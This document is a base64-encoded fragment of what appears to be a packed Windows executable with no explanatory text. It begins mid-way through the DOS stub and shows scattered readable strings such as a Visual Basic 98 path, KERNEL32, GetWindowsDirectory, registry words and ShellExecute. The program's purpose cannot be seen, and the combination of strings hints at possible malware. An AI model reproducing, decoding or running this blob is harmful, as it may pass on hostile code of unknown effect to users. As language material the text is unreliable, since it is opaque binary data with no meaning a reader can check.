ZGUuDQ0KJAAAAAAAAAA9AHveeWEVjXlhFY15YRWN+n0bjXhhFY0QfhyNfmEVjZB+GI14YRWNUmlj
aHlhFY0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQRQAATAEDANVFCjwAAAAAAAAAAOAADwELAQYA
AIAAAAAgAAAAwAEA8EwCAADQAQAAUAIAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAABwAgAA
BAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAORhAgCcAAAAAFACAOQR
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGNvZGUAAAAA
AMABAAAQAAAAAAAAAAQAAAAAAAAAAAAAAAAAAIAAAOB0ZXh0AAAAAACAAAAA0AEAAIAAAAAEAAAA
AAAAAAAAAAAAAABAAADgLnJzcmMAAAAAIAAAAFACAAAUAAAAhAAAAAAAAAAAAAAAAAAAQAAAwAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgCpqamurodRuVgxWwA+2b9/CH1h
EEBIC15ZwxU4uJId22TbT3yB7KQPAG6+T8461759B7gOjY0+/wAMAXaDZV4mKV44Li5eJX17Ii+Q
h3d4ZUVIh2drW2uwe6e31PmmeNjo+PHw1+Sw+MkOjY0+/wAMAXaDZSMlgeykDwAqvivOLte+Lwe4
DnuNLf8ADAFegz6nydS04MO1qa6OkchfBJ/5DAkCB95bhYxKcouIoigCAOJ8AAAAIAIAJgIAyf8h
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
